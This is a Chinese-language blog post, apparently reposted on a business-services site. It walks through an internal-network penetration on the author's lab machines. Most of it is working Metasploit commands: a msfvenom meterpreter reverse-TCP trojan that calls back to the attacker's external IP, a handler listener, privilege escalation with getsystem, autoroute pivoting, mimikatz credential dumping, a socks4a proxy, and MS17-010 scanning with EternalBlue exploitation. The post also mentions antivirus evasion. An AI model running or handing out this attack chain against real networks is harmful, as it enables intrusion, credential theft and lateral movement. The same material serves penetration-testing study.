内网渗透的一次记录
发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370
0x00:前言 在对目标进行渗透时,一般情况下,我们首先获得对方服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续再对目标服务器进行进一步的权限控制。比如布置后门、跳板、维持权限等;我这就简单的就靶机演示一下内网的渗透。 0x01:环境准备 1、利用msf生成远控木马。如果对方服务器有杀软,还需要进行shellcode编码或者进行做免杀处理,不然马🐎上不去。 命令:msfvenom -p windows/x64/meterpreter_reverse_tcp lhost="IP" lport=5155 -f exe -o ./system64.exe “IP”为你自己kali的“外网”IP 2、把生成的马🐎放上对方的服务器上。 3、kali中kali开启监听模式 我是在服务器中部署了kali,所以IP已经是“外网”的 执行“exploit”就获取到了会话(别问为什么不继续,因为靶机出不去“外网” 只能自己虚拟机搭建环境演示。) 4、下面我演示的是自己内网的一台虚拟机。我也在同网段开启了三台机器来模拟内网。 2008 R2 虚拟机的IP是192.168.124.27 kali环境的准备 use exploit/multi/handlerset payload windows/x64/meterpreter_reverse_tcpset lhost 192.168.124.11set lport 5155exploit Kali执行“exploit”开启监听模式 然后去对方服务器执行“luomiweixiong.exe”木马🐎 获取到会话 0x02:深入内网 1、首先要获取目前的权限,当然手上的权限越大,越方便。 这里可以利用"getsystem"获取到system最高权限。 2、查验是否为虚拟机 run checkvm 这里可以看到对方为虚拟机 3、查网段 run get_local_subnets 对方为192.168.124.0/24网段 4、获取路由信息 run get_local_subnets 5、自动添加路由信息 run post/multi/manage/autoroute 6、查看路由信息 run autoroute -p 7、获取凭证 load mimikatzwdigest 这里打码的地方是我虚拟机的明文密码 这里就不展示了 8、流量跳板 首先要通过socks4代理进行流量转发出来 backgrounduse auxiliary/server/socks4ashow optionsset srvhost 192.168.124.27runnetstat -antp | grep 1080 跳板准备完毕 9、进程迁移 绑定进程:migratepid 10、内网IP存活检测 先将网段加进路由表 IP段端口简单检测 使用MSF检测IP段MS17010漏洞:use auxiliary/scanner/smb/smb_ms17_010 show optionsset rhosts IP段/24set threads 50run 192.168.124.20的445端口开启着(它是我的win7虚拟机) 进一步利用 use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.124.20run 最后会获取到会话,这样就完成了一次跳跃。获取到会话后,就可以按上面的命令进行获取信息了。比如获取用户名,进程等。 如果对方是利用路由做的IP二次动态分配,比如,192.168.124.0/24分配了192.168.125.0/24。那么也有办法进行纵向的渗透。 这里也有很多命令,建立大家做笔记 https://www.freebuf.com/company-information/189580.html 请开动你的脑洞,敲起你的键盘,内网漫游起来吧。 文章来源:洛米唯熊
- 上一篇:后渗透之维护权限
- 下一篇:干货|Python渗透测试工具库